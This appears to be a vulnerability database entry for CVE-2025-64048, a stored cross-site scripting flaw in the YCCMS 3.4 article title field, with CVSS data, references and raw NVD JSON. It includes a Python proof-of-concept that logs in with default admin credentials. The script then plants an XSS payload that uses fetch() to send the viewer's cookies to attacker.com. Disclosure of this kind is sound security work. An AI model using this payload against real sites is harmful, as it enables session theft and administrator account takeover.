CVE-2025-64048

Description

YCCMS 3.4 contains a stored cross-site scripting (XSS) vulnerability in the article management functionality. The vulnerability exists in the add() and getPost() functions within the ArticleAction.class.php file due to improper neutralization of user input in the article title field.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:yccms:yccms:3.4:*:*:*:*:*:*:* - VULNERABLE

YCCMS 3.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-64048 PoC - YCCMS 3.4 Stored XSS
# Target: YCCMS 3.4 article management
# Vulnerability: Stored XSS in article title field

target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target.com/yccms"

# XSS payload - Cookie stealing example
xss_payload = "<img src=x onerror=\"fetch('https://attacker.com/log?c='+document.cookie)\">"

# Login first to get session
login_url = f"{target_url}/?s=Login/check"
login_data = {
    "username": "admin",
    "password": "admin"
}
session = requests.Session()
login_resp = session.post(login_url, data=login_data)

# Create malicious article with XSS in title
article_url = f"{target_url}/?s=Article/add"
article_data = {
    "title": xss_payload,
    "content": "Test article content",
    "category": "1"
}
article_resp = session.post(article_url, data=article_data)

# Access the article to trigger XSS
article_list_url = f"{target_url}/?s=Article/index"
list_resp = session.get(article_list_url)

print(f"[+] XSS payload sent: {xss_payload}")
print(f"[+] Article created. Visit article page to trigger XSS.")
print(f"[+] When admin views article list, cookie will be sent to attacker.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64048
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64048
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64048/
[4] VulDB https://vuldb.com/cve/CVE-2025-64048
[5] http://yccms.com
[6] https://gist.github.com/b1uel0n3/8354650e683ffb0812bfe72b702b482d

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64048", "sourceIdentifier": "[email protected]", "published": "2025-11-24T20:15:50.683", "lastModified": "2025-12-01T16:00:29.883", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "YCCMS 3.4 contains a stored cross-site scripting (XSS) vulnerability in the article management functionality. The vulnerability exists in the add() and getPost() functions within the ArticleAction.class.php file due to improper neutralization of user input in the article title field."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:yccms:yccms:3.4:*:*:*:*:*:*:*", "matchCriteriaId": "3F56CD95-068E-4BEA-978B-E9CE8CF16444"}]}]}], "references": [{"url": "http://yccms.com", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://gist.github.com/b1uel0n3/8354650e683ffb0812bfe72b702b482d", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}